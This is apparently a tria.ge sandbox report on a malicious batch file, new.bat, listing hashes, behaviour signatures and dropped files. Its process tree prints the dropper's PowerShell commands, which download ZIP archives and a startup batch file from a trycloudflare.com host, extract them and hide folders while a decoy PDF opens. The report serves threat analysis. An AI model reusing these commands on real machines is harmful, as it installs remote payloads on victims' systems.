Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
300s -
max time network
180s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
11/07/2024, 18:51
General
-
Target
new.bat
-
Size
25KB
-
MD5
2a6aaf30c4f4fb95035d448aea4b452e
-
SHA1
c4705f2f325c3c0665ce479b79621ba03d9d4382
-
SHA256
0fccf3d1fb38fa337baf707056f97ef011def859901bb922a4d0a1f25745e64f
-
SHA512
22109814422f467121c80c0155615fb72105c369b91e0617e11f011c661c738ce7a59272ae362a3d3c171fb874c53c24094d742feb73ab01b5f5466dd6b8b292
-
SSDEEP
768:Hrr046orC222qPZDorKS/A8r0grKZr5LmnfcY+ecZhs7rRgE9plN7rAZo1hR7rCy:X
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Powershell Invoke Web Request.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 37 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 37 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ride-fatal-italic-information.trycloudflare.com/kbsfaw.pdf2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2836 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for PDF to open (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ride-fatal-italic-information.trycloudflare.com/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Python"2⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for PDF to open (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ride-fatal-italic-information.trycloudflare.com/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://ride-fatal-italic-information.trycloudflare.com/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Print"2⤵
- Views/modifies file attributes
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
342B
MD566e078b40497ab666adc38d2eadc3336
SHA1da96cca310efebba760cc58223f169079318d5ee
SHA25666aec4375c2531af89fdb8d77ecf6dc7b2f20b5b565a0ecbfbdf02dd139edfeb
SHA51223030c6e0bba6ac4dd8e21bbed5efd948f3c85eecc83590cac0436f1f7fca1ba11a94690959a851ee465431a0f9cc426b3f3050b032b3412058316f993f0f8b6
-
Filesize
342B
MD51285201c7f54e57833ac258cf9129a46
SHA1881b91b538e56c801430086d2fc162446ffa6073
SHA2562c12794310b0230dba50767e0dff53c86ccdca475a5e49c0a6f3fef07c0d5b65
SHA512c285c762e4dc24608073d4eb8e7ce8636f0b211dfd327cad0bdcf0d84e937f21c02e5cbf7b57bff260e59b861482ce99a131fd3b59d333274060a3bb6b72b7da
-
Filesize
342B
MD57da63636d39e7c0cbd8af18ebfeb07b4
SHA1266eaba092d0cddc41b7e51dbf9821f9be0f41a0
SHA256b8db103f3b4abbabecf5146f6c68f5055f6c86abf81b5a5f7a0f8f6d372cc9a3
SHA5127e89349e2511d0aed4998f39f3cd7fee450fe5d2588e51001884c8ef73796db3653802fc34ab25cd8417386cffc4383a8bc1e864c8a791437f081ed8c4d0170a
-
Filesize
342B
MD5ab89a366c964e9cbcf78ecf178dc9f63
SHA172d4803dfcc8b8c816b15968129af797dedad88e
SHA256241ced8e2a28ac864c80692ff0c2419769074038faf938ef63b071b63a4d2b4f
SHA512b55996b84876db700b32910dfc333d2c9ee28bf65c658917bcffed7829ae7ede28aac5c11037739d3c1167a5bccfddbb494e5d1604ba99527d97d227787a3b4a
-
Filesize
342B
MD550624a943efefd1ca082620ea393b84d
SHA1b7dbb16c3d981a49b43e0c26317b076e96874399
SHA2565159fb14518b95bfec187cad0b68d27d303b304509d9596bbd613bc42cb55145
SHA5121bf912af558a98325594d71d661f385f3596da206b772f6d6d8a6a8b09eb2268b930a59fe98b74b52a9fa260c5a51c65cfcd837145b2c8c8a8e464333108b1ab
-
Filesize
342B
MD52966c32635c2be3c28642cf9843e2ad1
SHA1e3f7774e13c4cffc74320a340e2936459bd2d546
SHA256e1a5688a3af6bfe233de57a6a3a43e95640cb1d2c0650a7c9cca85704178db66
SHA51221d8995c14f13c130c6d91f5b5489db918ff26e36beeda0d20a028ab44ec718f433ab5ab91dd786f609d9cb4e67391daccb5cac8517678013a8b8f5c9f872dc1
-
Filesize
342B
MD52de2e92834a89944dac61208e6e447e9
SHA1cc96e748a929ac41ecfd89276f17426c42e3f331
SHA256a29e1688b2aed3d6e8e939b84f9b1d98bfdc00ed1cdcc13ed76384f6ada56140
SHA5120e9cdd1a228e27a9595acbb8a11d30ef24f40fbd82cb03b0f98852cbf780b2b65c5d52482656f3b91bb8af1e4c851cedc62acf05d27ed41af4f87e389410ff5a
-
Filesize
342B
MD5d26d10496b79df1c55c79dc4678fe1c4
SHA1e4d80029c81e6797e698f82b71ff406f255815c5
SHA25602ca5f97b0b1cc93f3a3cbdcab191d4e6f1215c40d605d2e0472a2a7979c84e6
SHA512745b8c2840fe75b84b5fafc0e318a1c56a63ee39223997f4a5746f64e016b7f359803d491893e62e651e0933e95581a26189f98c131069325023d2489e3899c4
-
Filesize
342B
MD5c47575fb812711df4b730521946d8182
SHA19484cdd1d3021f1d2850ccaf53e640fac8e0cc76
SHA256f9279db46dbde66b55ca6997d35bd73cf20210508b0c210371aab7dbd0956b63
SHA5124fe70d578c1493d1c4edfc0e569e183303a2a992c1f6b78a6e1988d8c6618acd5dfbc8b269996b4f85ca81642dc2e51efef609f4d85602c1d711ba54d9cb9ee7
-
Filesize
342B
MD5a54c1ea27383fa02ea70322639aca021
SHA1d6cb82db2636d03c6f7e8e886803b5d796bc3c77
SHA25658077fbb0b074ebc03c13c5c880216ccd26d2c5573fcab2d9c8d8897209b3d9e
SHA5127417c2665435e44e29a4048e5e9fba53120b3c652281dc0dc8ff6ee6fe7281c7f13a9662ff0e08bd0cb3eacd3b725a8759c6846b3b365f6d344f1db49c8ea4c7
-
Filesize
342B
MD5be5630804e770a88f76ec6a78b96b0f9
SHA102df16287dac32a5449d5ed2c74f48f1bc56131f
SHA256a2db52f7841145ffe5012a2b2db9f92e7a47d66b6a87a0f1b9424dfebf3ce819
SHA51203479ed5c9ed1b88679ffe4a8fb1073d48490f0f8ea14ce5be86cdfc35a83ebb5b2d20ea65680f09bc6d13e28f5a683100efc61babf49ae81532cb29e437764f
-
Filesize
342B
MD52f26baa3510b32bfdb9acab27dcc801d
SHA10ca665b1c13798a9ac8ef979dadb41236f109b0a
SHA25689e25f5e6981b5b41d20c03bc55ca3d3530a5f4157c702ce0e9bd2a58c66bbe9
SHA5125ca624ef84646b7dbf23c6a2f537b43da11bd4943ab1bf94fa733debd7af487a3598ce2bf639f65f3213fefab1c72c53125c0a27ec28ddcf4d164d709af8fb79
-
Filesize
342B
MD51a401e462ac0dbbaeb01ebd872963d16
SHA1ec732b6cf3c35297ab824739453b5036e82a11fa
SHA2561cc6d6f1522422c964b819a78648e8ee1ad607189cb5b25bdf9c3852d0441e28
SHA512ca5a494290a1993bb9197fbfc93d332789c3d0d868961f79f633ad6eb3f12215cc377bef7d76155424a44560b347e1459d600490d24ea7a28b9f81ef0b3c11a7
-
Filesize
342B
MD5347aa6b07f7a4c82b20605bcd0feb8c0
SHA14ac6a7b084e6edf8d979118dcc8964432f602fea
SHA256185bdc1299e9255fed3a2fac0f0fb7d1e5c265aed87101bb02e88edb65d38683
SHA51208f16b8f5f9c81f03dcdc2ef0aa4400e16ae7a2c1732d75a98714d8b23361473eb1b06a539d12b4aa666e8282e730a5006d801d53d62feac9218c16c1e03aac7
-
Filesize
342B
MD5c9af1d8dc7e6b6376b9845d0740010cd
SHA13e41feee6205968b68dc5580849c8fa68c863cea
SHA2566671a1219137273596b29c48c0989c919f0051321e3c581875e4e7505ea456d5
SHA512154a8358e1e0b02ceebc610901edcc0d2c498b17ec3c87a314dfdc829a803cd93e1b1736bd69b39776e1788bb47ab4fa5a64bf280c4dea0f351f248b3b34770a
-
Filesize
342B
MD5693c33647132fc1d081cdad474dcd741
SHA1a56da61def7550e4e55548c2510518de57cf6d18
SHA2560cc57c5f96ba0ca3c757324e13d57a926b32e67e4e98d4586b71ae8ad6db6d70
SHA51271d5cacb33c1199ebf27b29a1ec068f2bb7f60ae118bacb21bb019393f5cd21ae07dcee515e60d4ef1ce0f22fe02ba807eba44cecdc5128b051d6fe2c77b519c
-
Filesize
342B
MD517fdb8b3303d8acce5a2d7c641399a35
SHA12cadb9c4cc09314cc900354b90324d09a32a7527
SHA25602a2d04c27e9b4550e6e8f06a0dc3f43185d4b4086af548a4f69c98b4c5f2949
SHA51205f13c089a6946705b6bc2b43390d471067be2e1fbdce8231992caa9c185a156e075bd5da66a8e0bfacb4261026bee4744b67044b6ce206c1a4fc7ebcdcba682
-
Filesize
342B
MD5412f68c3043155f0371c5c9c80db71f5
SHA1418b485752535cf0380c8c5acced8d045f8e53a5
SHA25651b12404a2abbcce3eb72f2442365d6c7bb906379a293c309f5e061be68d1884
SHA5128073f34f1172fe7ae7f21c7ec214ff183e565d6726dd4e8cb2ab9a64784eebb1f437e556def4e0b2e65e2e594cf837e32ba1d35c106480583622e81767582b42
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD5d92b6601c66df7fb1592317e57b68dd6
SHA17513b1ddc23bd2d066b665b4a15f7b884922c3e3
SHA2565adc1d58ffc8d06913b79f9d8da6637e41aa332c481e65f686ff6e7820735b7c
SHA5129253f2373c61862934bf1f2ed2ebeb682c9741ad8e44dee3f237649a00a1616e7600a89854fbcfb160d9038732a16896654d1fddb80ec6829ee75ad67399518f
-
Filesize
7KB
MD5191b6feafbcc6f9adfb7948c86232526
SHA1cbb806bc7c2298dbcc30ddf454415bb9e5b431d6
SHA256926b737340bb0ab491759867ee86b6562b2f3320b7deeba15ffda49abd8c5a6b
SHA512b2bd3b6e0865d42126dc93cdeb643dae7ea791ddecd01e784346d0a7155889db028d2c0552946ecef7361b5b9878df871a05a35511359e8b5bf6d7e99f35ec90
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
2.9MB